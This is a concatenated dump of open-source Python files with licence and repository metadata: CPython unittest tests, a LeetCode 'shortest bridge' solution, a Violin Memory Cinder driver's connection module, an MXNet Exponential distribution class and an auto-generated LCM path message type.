        result = unittest.TextTestResult(None, True, 1)
        self.assertEqual(
                result.getDescription(self),
               ('testGetDescriptionWithMultiLineDocstring '
                '(' + __name__ + '.Test_TestResult)\n'
                'Tests getDescription() for a method with a longer '
                'docstring.'))
    def testStackFrameTrimming(self):
        class Frame(object):
            class tb_frame(object):
                f_globals = {}
        result = unittest.TestResult()
        self.assertFalse(result._is_relevant_tb_level(Frame))
        Frame.tb_frame.f_globals['__unittest'] = True
        self.assertTrue(result._is_relevant_tb_level(Frame))
    def testFailFast(self):
        # Traceback formatting is stubbed out so addError/addFailure can be
        # fed None for both the test and the exc_info tuple.
        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addError(None, None)
        self.assertTrue(result.shouldStop)
        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addFailure(None, None)
        self.assertTrue(result.shouldStop)
        result = unittest.TestResult()
        result._exc_info_to_string = lambda *_: ''
        result.failfast = True
        result.addUnexpectedSuccess(None)
        self.assertTrue(result.shouldStop)
    def testFailFastSetByRunner(self):
        runner = unittest.TextTestRunner(stream=StringIO(), failfast=True)
        def test(result):
            self.assertTrue(result.failfast)
        runner.run(test)
# Build ``OldResult``: a stand-in for a pre-Python-2.7 TestResult class.
# Start from TestResult's namespace and strip the methods added in 2.7 so
# the backwards-compatibility shims in unittest can be exercised against it.
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
          '__init__'):
    del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
    # Minimal old-style initializer providing only the pre-2.7 attributes.
    self.failures = []
    self.errors = []
    self.testsRun = 0
    self.shouldStop = False
    self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
    """Check the RuntimeWarning shims for pre-2.7 TestResult objects."""
    def assertOldResultWarning(self, test, failures):
        # Running against OldResult must emit the "TestResult has no add.+
        # method" RuntimeWarning and record the expected failure count.
        with test_support.check_warnings(("TestResult has no add.+ method,",
                                          RuntimeWarning)):
            result = OldResult()
            test.run(result)
            self.assertEqual(len(result.failures), failures)
    def testOldTestResult(self):
        class Test(unittest.TestCase):
            def testSkip(self):
                self.skipTest('foobar')
            @unittest.expectedFailure
            def testExpectedFail(self):
                raise TypeError
            @unittest.expectedFailure
            def testUnexpectedSuccess(self):
                pass
        for test_name, should_pass in (('testSkip', True),
                                       ('testExpectedFail', True),
                                       ('testUnexpectedSuccess', False)):
            test = Test(test_name)
            self.assertOldResultWarning(test, int(not should_pass))
    # (sic: "Tesult" typo is preserved -- renaming would change the test id.)
    def testOldTestTesultSetup(self):
        class Test(unittest.TestCase):
            def setUp(self):
                self.skipTest('no reason')
            def testFoo(self):
                pass
        self.assertOldResultWarning(Test('testFoo'), 0)
    def testOldTestResultClass(self):
        @unittest.skip('no reason')
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        self.assertOldResultWarning(Test('testFoo'), 0)
    def testOldResultWithRunner(self):
        class Test(unittest.TestCase):
            def testFoo(self):
                pass
        runner = unittest.TextTestRunner(resultclass=OldResult,
                                          stream=StringIO())
        # This will raise an exception if TextTestRunner can't handle old
        # test result objects
        runner.run(Test('testFoo'))
class MockTraceback(object):
    """Stub for the traceback module that yields a fixed rendering."""
    @staticmethod
    def format_exception(*_):
        """Ignore all arguments and return a canned traceback list."""
        return ['A traceback']
def restore_traceback():
    """Undo MockTraceback patching by reinstalling the real module."""
    unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
    """Tests for TestResult.buffer: capturing stdout/stderr during a test."""
    def setUp(self):
        self._real_out = sys.stdout
        self._real_err = sys.stderr
    def tearDown(self):
        sys.stdout = self._real_out
        sys.stderr = self._real_err
    def testBufferOutputOff(self):
        real_out = self._real_out
        real_err = self._real_err
        result = unittest.TestResult()
        self.assertFalse(result.buffer)
        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)
        result.startTest(self)
        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)
    def testBufferOutputStartTestAddSuccess(self):
        real_out = self._real_out
        real_err = self._real_err
        result = unittest.TestResult()
        self.assertFalse(result.buffer)
        result.buffer = True
        self.assertIs(real_out, sys.stdout)
        self.assertIs(real_err, sys.stderr)
        result.startTest(self)
        # With buffering on, startTest swaps in fresh StringIO streams.
        self.assertIsNot(real_out, sys.stdout)
        self.assertIsNot(real_err, sys.stderr)
        self.assertIsInstance(sys.stdout, StringIO)
        self.assertIsInstance(sys.stderr, StringIO)
        self.assertIsNot(sys.stdout, sys.stderr)
        out_stream = sys.stdout
        err_stream = sys.stderr
        result._original_stdout = StringIO()
        result._original_stderr = StringIO()
        print 'foo'
        print >> sys.stderr, 'bar'
        self.assertEqual(out_stream.getvalue(), 'foo\n')
        self.assertEqual(err_stream.getvalue(), 'bar\n')
        self.assertEqual(result._original_stdout.getvalue(), '')
        self.assertEqual(result._original_stderr.getvalue(), '')
        result.addSuccess(self)
        result.stopTest(self)
        self.assertIs(sys.stdout, result._original_stdout)
        self.assertIs(sys.stderr, result._original_stderr)
        self.assertEqual(result._original_stdout.getvalue(), '')
        self.assertEqual(result._original_stderr.getvalue(), '')
        self.assertEqual(out_stream.getvalue(), '')
        self.assertEqual(err_stream.getvalue(), '')
    def getStartedResult(self):
        result = unittest.TestResult()
        result.buffer = True
        result.startTest(self)
        return result
    def testBufferOutputAddErrorOrFailure(self):
        # Patch in MockTraceback so the formatted traceback is predictable.
        unittest.result.traceback = MockTraceback
        self.addCleanup(restore_traceback)
        for message_attr, add_attr, include_error in [
            ('errors', 'addError', True),
            ('failures', 'addFailure', False),
            ('errors', 'addError', True),
            ('failures', 'addFailure', False)
        ]:
            result = self.getStartedResult()
            buffered_out = sys.stdout
            buffered_err = sys.stderr
            result._original_stdout = StringIO()
            result._original_stderr = StringIO()
            print >> sys.stdout, 'foo'
            if include_error:
                print >> sys.stderr, 'bar'
            addFunction = getattr(result, add_attr)
            addFunction(self, (None, None, None))
            result.stopTest(self)
            result_list = getattr(result, message_attr)
            self.assertEqual(len(result_list), 1)
            test, message = result_list[0]
            expectedOutMessage = textwrap.dedent("""
                Stdout:
                foo
            """)
            expectedErrMessage = ''
            if include_error:
                expectedErrMessage = textwrap.dedent("""
                Stderr:
                bar
            """)
            expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
            self.assertIs(test, self)
            self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
            self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
            self.assertMultiLineEqual(message, expectedFullMessage)
    def testBufferSetupClass(self):
        result = unittest.TestResult()
        result.buffer = True
        class Foo(unittest.TestCase):
            @classmethod
            def setUpClass(cls):
                1//0
            def test_foo(self):
                pass
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)
    def testBufferTearDownClass(self):
        result = unittest.TestResult()
        result.buffer = True
        class Foo(unittest.TestCase):
            @classmethod
            def tearDownClass(cls):
                1//0
            def test_foo(self):
                pass
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)
    def testBufferSetUpModule(self):
        result = unittest.TestResult()
        result.buffer = True
        class Foo(unittest.TestCase):
            def test_foo(self):
                pass
        class Module(object):
            @staticmethod
            def setUpModule():
                1//0
        Foo.__module__ = 'Module'
        sys.modules['Module'] = Module
        self.addCleanup(sys.modules.pop, 'Module')
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)
    def testBufferTearDownModule(self):
        result = unittest.TestResult()
        result.buffer = True
        class Foo(unittest.TestCase):
            def test_foo(self):
                pass
        class Module(object):
            @staticmethod
            def tearDownModule():
                1//0
        Foo.__module__ = 'Module'
        sys.modules['Module'] = Module
        self.addCleanup(sys.modules.pop, 'Module')
        suite = unittest.TestSuite([Foo('test_foo')])
        suite(result)
        self.assertEqual(len(result.errors), 1)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
| gpl-2.0 |
openqt/algorithms | leetcode/python/lc934-shortest-bridge.py | 1 | 1132 | # coding=utf-8
import unittest
"""934. Shortest Bridge
https://leetcode.com/problems/shortest-bridge/description/
In a given 2D binary array `A`, there are two islands. (An island is a
4-directionally connected group of `1`s not connected to any other 1s.)
Now, we may change `0`s to `1`s so as to connect the two islands together to
form 1 island.
Return the smallest number of `0`s that must be flipped. (It is guaranteed
that the answer is at least 1.)
**Example 1:**
**Input:** [[0,1],[1,0]]
**Output:** 1
**Example 2:**
**Input:** [[0,1,0],[0,0,0],[0,0,1]]
**Output:** 2
**Example 3:**
**Input:** [[1,1,1,1,1],[1,0,0,0,1],[1,0,1,0,1],[1,0,0,0,1],[1,1,1,1,1]]
**Output:** 1
**Note:**
1. `1 <= A.length = A[0].length <= 100`
2. `A[i][j] == 0` or `A[i][j] == 1`
Similar Questions:
"""
class Solution(object):
    """DFS + BFS solution: flood-fill one island, then grow it outward.

    The previous version was an empty stub that returned None for every
    input; this implements the algorithm so the documented examples hold.
    """

    def shortestBridge(self, A):
        """Return the minimum number of 0s to flip to join the two islands.

        :type A: List[List[int]]
        :rtype: int
        """
        rows, cols = len(A), len(A[0])

        def neighbors(r, c):
            # 4-directionally adjacent in-bounds cells.
            for x, y in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
                if 0 <= x < rows and 0 <= y < cols:
                    yield x, y

        # Locate one cell of the first island (guaranteed to exist).
        start = next((r, c)
                     for r in range(rows)
                     for c in range(cols) if A[r][c])
        # Iterative DFS flood fill of the first island.
        seen = {start}
        stack = [start]
        island = []
        while stack:
            cell = stack.pop()
            island.append(cell)
            for nxt in neighbors(*cell):
                if nxt not in seen and A[nxt[0]][nxt[1]]:
                    seen.add(nxt)
                    stack.append(nxt)
        # Level-by-level BFS out from the whole island; the level count at
        # which we first touch an unseen 1 (the second island) equals the
        # number of 0s that must be flipped.
        frontier = island
        flips = 0
        while frontier:
            next_frontier = []
            for cell in frontier:
                for nbr in neighbors(*cell):
                    if nbr in seen:
                        continue
                    if A[nbr[0]][nbr[1]]:
                        return flips
                    seen.add(nbr)
                    next_frontier.append(nbr)
            frontier = next_frontier
            flips += 1
        return -1  # Unreachable: the problem guarantees two islands.
class T(unittest.TestCase):
    """Placeholder test case for the solution above."""

    def test(self):
        """No-op smoke test."""
        pass
# Run this module's unit tests when executed directly.
if __name__ == "__main__":
    unittest.main()
| gpl-3.0 |
rlucio/cinder-violin-driver-icehouse | cinder/volume/drivers/violin/vxg/__init__.py | 1 | 8636 | #!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Violin Memory, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Get our library version
try:
    # version.py carries the real version string when installed from a
    # built package.
    import cinder.volume.drivers.violin.vxg.version
    __version__ = cinder.volume.drivers.violin.vxg.version.__version__
except Exception:
    # version.py is autogenerated during packaging. If we are running
    # against original source it will not be present.
    __version__ = "unknown"
import sys
import urllib2
# Require python 2.6.0
# Use hexversion for arithmetic comparison versus major-minor-micro tuple;
# it packs the full version into a single monotonically increasing int.
if sys.hexversion <= 0x02060000:
    raise ImportError("Requires python 2.6. Running python %d.%d.%d." %
                      (sys.version_info[0], sys.version_info[1],
                       sys.version_info[2]))
import inspect
from cinder.volume.drivers.violin.vxg.core.session import Vmos7JsonSession
from cinder.volume.drivers.violin.vxg.core.session import XGSession
from cinder.volume.drivers.violin.vxg.varray import varray
from cinder.volume.drivers.violin.vxg.vmos7 import vmos7
from cinder.volume.drivers.violin.vxg.vshare import vshare
def open(host, user='admin', password='', proto='https',
         version=1, debug=False, http_fallback=True,
         keepalive=False, logger=None):
    """Opens up a REST connection with the given Violin appliance.
    This will first login to the given host, then access that host's version
    node registration. Depending on what the host identifies itself as, an
    object compatible with that particular version will be returned.
    If there are any problems (such as auth failure or inaccessible hostname),
    then None will be returned.
    Arguments:
        host -- Name or IP address of the host to connect to
        user -- Username to login with
        password -- Password for the user
        proto -- Either 'http' or 'https'
        version -- Reserved for future use
        debug -- Enable/disable debugging to stdout (bool)
        http_fallback -- If proto is https and https fails, fallback to http
        keepalive -- Attempt to reconnect on session loss
        logger -- Where to send logs (default: sys.stdout)
    Returns:
        An authenticated REST connection to the appliance. If there are any
        connection problems, then None is returned.
    """
    # NOTE: this function deliberately shadows the builtin open(); it is
    # the package's public entry point.
    # Build up protocols to attempt
    protocols_to_try = []
    if proto.lower() == 'https':
        protocols_to_try.append('https')
    if proto.lower() == 'http' or http_fallback:
        protocols_to_try.append('http')
    # Verify the logger
    log_fd = None
    if logger is None:
        log_fd = sys.stdout
    elif (hasattr(logger, 'write') and callable(logger.write) and
          hasattr(logger, 'flush') and callable(logger.flush)):
        log_fd = logger
    else:
        raise ValueError('logger needs callable "write" and "flush" methods')
    # Discover the Violin appliance supplied
    for current_protocol in protocols_to_try:
        try:
            stream = urllib2.urlopen('{0}://{1}'.format(
                current_protocol, host))
        except urllib2.URLError as e:
            if debug:
                log_fd.write('{0}: {1}'.format(current_protocol, e))
                log_fd.flush()
        else:
            try:
                html = stream.read()
            except Exception as e:
                if debug:
                    log_fd.write('{0} (read): {1}'.format(
                        current_protocol, e))
                    log_fd.flush()
                # Best-effort close; the read already failed.
                try:
                    stream.close()
                except Exception:
                    pass
            else:
                opener = None
                # Sniff the landing page content to classify the device
                # family and pick the matching gateway opener.
                if 'viewport' in html:
                    opener = _open_json_gateway
                elif 'template' in html:
                    opener = _open_xml_gateway
                elif 'Violin Concerto Console' in html:
                    opener = _open_vmos7_json_gateway
                stream.close()
                if opener:
                    # Only IndexError is trapped here; e.g. the Symphony
                    # opener's NotImplementedError propagates to the caller.
                    try:
                        return opener(host, user, password, current_protocol,
                                      version, debug, keepalive, log_fd)
                    except IndexError as e:
                        log_fd.write('Failed to get authenticated session ' +
                                     'and/or retrieve the ' +
                                     'version ({0}): {1}'.format(
                                         e.__class__.__name__, e))
                        log_fd.flush()
                        return None
    # Nothing worked
    return None
def _get_session_and_version(cls_type, host, user, password, debug,
                             proto, keepalive, log_fd):
    """Instantiate *cls_type* and query it for version information.

    Returns a ``(session, version_info)`` tuple where ``session`` is the
    freshly created connection object and ``version_info`` is whatever
    its ``_get_version_info`` method reports.
    """
    conn = cls_type(host, user, password, debug, proto, True,
                    keepalive, log_fd)
    info = conn._get_version_info()
    return (conn, info)
def _open_vmos7_json_gateway(host, user, password, proto,
                             version, debug, keepalive, log_fd):
    """Open an authenticated JSON REST session to a Violin vMOS7 device.

    Creates a Vmos7JsonSession, retrieves its version information, and
    resolves the best-matching device class from the ``vmos7`` module.
    """
    conn, info = _get_session_and_version(Vmos7JsonSession, host, user,
                                          password, debug, proto,
                                          keepalive, log_fd)
    return __getDeviceFor(info, conn, vmos7, debug)
def _open_json_gateway(host, user, password, proto,
                       version, debug, keepalive, log_fd):
    """Placeholder for Violin Symphony JSON REST support.

    Symphony devices are not handled by this library, so this
    unconditionally raises NotImplementedError.
    """
    raise NotImplementedError('Violin Symphony devices are unsupported')
def _open_xml_gateway(host, user, password, proto,
                      version, debug, keepalive, log_fd):
    """Open the traditional tallmaple (XML) REST connection.

    ACM appliances (type 'A') resolve to a varray device class, while
    memory gateways (types 'G' and 'V') resolve to a vshare device
    class.  Any other reported host type raises an Exception.
    """
    conn, info = _get_session_and_version(XGSession, host, user,
                                          password, debug, proto,
                                          keepalive, log_fd)
    host_type = info['type']
    if host_type == 'A':
        # ACM appliance
        return __getDeviceFor(info, conn, varray, debug)
    if host_type in ('G', 'V'):
        # Memory gateway
        return __getDeviceFor(info, conn, vshare, debug)
    raise Exception('Unknown version host_type: {0}'.format(host_type))
def __getDeviceFor(version_info, session, moduleToSearch, debug):
    """Resolve and instantiate the device class matching an appliance.

    Scans *moduleToSearch* for connection classes (classes whose name
    contains ``moduleToSearch.CLASS_NAMES``) and indexes them by every
    version they advertise via their ``_versions`` attribute, which may
    be a dotted version string or a list of such strings.  The newest
    class whose declared version does not exceed the appliance's
    version is instantiated with ``(session, version_info)`` and
    returned.

    Arguments:
    version_info -- dict containing at least a dotted 'version' string
    session -- authenticated session object; closed if no class matches
    moduleToSearch -- module providing candidate classes and CLASS_NAMES
    debug -- currently unused here; kept for interface compatibility

    Raises an Exception when a class declares ``_versions`` of an
    unsupported type, or when no candidate class matches the version.
    """
    version_as_tuple = __to_version_tuple(version_info['version'])
    supported_versions = {}
    for name, obj in inspect.getmembers(moduleToSearch):
        if (inspect.isclass(obj) and name.find(
                moduleToSearch.CLASS_NAMES) > -1):
            if isinstance(obj._versions, basestring):
                supported_versions[__to_version_tuple(obj._versions)] = obj
            elif isinstance(obj._versions, list):
                for x in obj._versions:
                    supported_versions[__to_version_tuple(x)] = obj
            else:
                # Bug fix: this branch previously read ``obj.versions``
                # (no such attribute), so the intended error message was
                # masked by an AttributeError.  The attribute is named
                # ``_versions``.
                raise Exception('Unknown version type' +
                                '%s ' % (obj._versions.__class__,) +
                                'encountered in ' +
                                'class %s.' % (name,))
    # Walk versions from newest to oldest; the first one that is not
    # newer than the appliance's version wins.
    for x in reversed(sorted(supported_versions.keys())):
        if version_as_tuple >= x:
            return supported_versions[x](session, version_info)
    # No candidate matched: release the session before failing.
    session.close()
    raise Exception('No matching connection class for {0}'.format(
        version_info))


def __to_version_tuple(version):
    """Turn a dotted version string into an int tuple for comparison."""
    return tuple(int(x) for x in version.split('.'))
| apache-2.0 |
leezu/mxnet | python/mxnet/gluon/probability/distributions/exponential.py | 5 | 3500 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=wildcard-import
"""Exponential Distribution."""
__all__ = ['Exponential']
from .exp_family import ExponentialFamily
from .constraint import Positive
from .utils import getF, sample_n_shape_converter, cached_property
class Exponential(ExponentialFamily):
    r"""Exponential distribution parameterized by its `scale` (1 / rate).

    Parameters
    ----------
    scale : Tensor or scalar
        Scale of the distribution (the reciprocal of the rate).
    F : mx.ndarray or mx.symbol.numpy._Symbol or None
        Variable recording the running mode; inferred from `scale`
        when not given.
    """
    # pylint: disable=abstract-method
    has_grad = True
    support = Positive()
    arg_constraints = {'scale': Positive()}

    def __init__(self, scale=1.0, F=None, validate_args=None):
        mode = getF(scale) if F is None else F
        self.scale = scale
        super(Exponential, self).__init__(
            F=mode, event_dim=0, validate_args=validate_args)

    @cached_property
    def rate(self):
        # Rate is the reciprocal of scale; cached after the first access.
        return 1 / self.scale

    @property
    def mean(self):
        return self.scale

    @property
    def stddev(self):
        return self.scale

    @property
    def variance(self):
        return self.scale ** 2

    def sample(self, size=None):
        """Draw samples with the given `size`."""
        return self.F.np.random.exponential(self.scale, size=size)

    def sample_n(self, size=None):
        """Draw `size` independent batches of samples."""
        return self.F.np.random.exponential(
            self.scale, size=sample_n_shape_converter(size))

    def broadcast_to(self, batch_shape):
        """Return a copy of this distribution broadcast to `batch_shape`."""
        inst = self.__new__(type(self))
        F = self.F
        inst.scale = F.np.broadcast_to(self.scale, batch_shape)
        super(Exponential, inst).__init__(F=F,
                                          event_dim=self.event_dim,
                                          validate_args=False)
        inst._validate_args = self._validate_args
        return inst

    def log_prob(self, value):
        """Log-density at `value`: log(rate) - rate * value."""
        if self._validate_args:
            self._validate_samples(value)
        F = self.F
        return F.np.log(self.rate) - self.rate * value

    def cdf(self, value):
        """Cumulative distribution function: 1 - exp(-rate * value)."""
        if self._validate_args:
            self._validate_samples(value)
        F = self.F
        return 1 - F.np.exp(-self.rate * value)

    def icdf(self, value):
        """Inverse CDF (quantile function): -scale * log(1 - value)."""
        F = self.F
        return - self.scale * F.np.log(1 - value)

    def entropy(self):
        """Differential entropy: 1 + log(scale)."""
        F = self.F
        return 1.0 + F.np.log(self.scale)

    @property
    def _natural_params(self):
        # Natural parameter of the exponential-family form: -rate.
        return (-self.rate,)

    def _log_normalizer(self, x):
        # pylint: disable=arguments-differ
        F = self.F
        return -F.np.log(-x)
| apache-2.0 |
zetian/ltl_sampling | src/python_vis/sampling/path_data.py | 1 | 2256 | """LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
try:
import cStringIO.StringIO as BytesIO
except ImportError:
from io import BytesIO
import struct
class path_data(object):
    """LCM message carrying a planar path as parallel x/y arrays.

    Auto-generated LCM type; the wire format (big-endian int32 count
    followed by two double arrays, prefixed by the 8-byte type
    fingerprint) must not change.
    """
    __slots__ = ["num_state", "state_x", "state_y"]
    __typenames__ = ["int32_t", "double", "double"]
    __dimensions__ = [None, ["num_state"], ["num_state"]]

    def __init__(self):
        # Number of valid entries in state_x / state_y.
        self.num_state = 0
        self.state_x = []
        self.state_y = []

    def encode(self):
        """Serialize this message, prefixed with the type fingerprint."""
        stream = BytesIO()
        stream.write(path_data._get_packed_fingerprint())
        self._encode_one(stream)
        return stream.getvalue()

    def _encode_one(self, stream):
        stream.write(struct.pack(">i", self.num_state))
        stream.write(struct.pack('>%dd' % self.num_state,
                                 *self.state_x[:self.num_state]))
        stream.write(struct.pack('>%dd' % self.num_state,
                                 *self.state_y[:self.num_state]))

    @staticmethod
    def decode(data):
        """Deserialize a path_data from bytes or a file-like object.

        Raises ValueError if the leading fingerprint does not match.
        """
        stream = data if hasattr(data, 'read') else BytesIO(data)
        if stream.read(8) != path_data._get_packed_fingerprint():
            raise ValueError("Decode error")
        return path_data._decode_one(stream)

    @staticmethod
    def _decode_one(stream):
        msg = path_data()
        msg.num_state = struct.unpack(">i", stream.read(4))[0]
        msg.state_x = struct.unpack('>%dd' % msg.num_state,
                                    stream.read(msg.num_state * 8))
        msg.state_y = struct.unpack('>%dd' % msg.num_state,
                                    stream.read(msg.num_state * 8))
        return msg

    _hash = None

    @staticmethod
    def _get_hash_recursive(parents):
        # Guard against recursive type definitions.
        if path_data in parents:
            return 0
        tmphash = (0x6655b004fa7976de) & 0xffffffffffffffff
        tmphash = (((tmphash << 1) & 0xffffffffffffffff) +
                   (tmphash >> 63)) & 0xffffffffffffffff
        return tmphash

    _packed_fingerprint = None

    @staticmethod
    def _get_packed_fingerprint():
        # Lazily pack and cache the 8-byte fingerprint on the class.
        if path_data._packed_fingerprint is None:
            path_data._packed_fingerprint = struct.pack(
                ">Q", path_data._get_hash_recursive([]))
        return path_data._packed_fingerprint
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.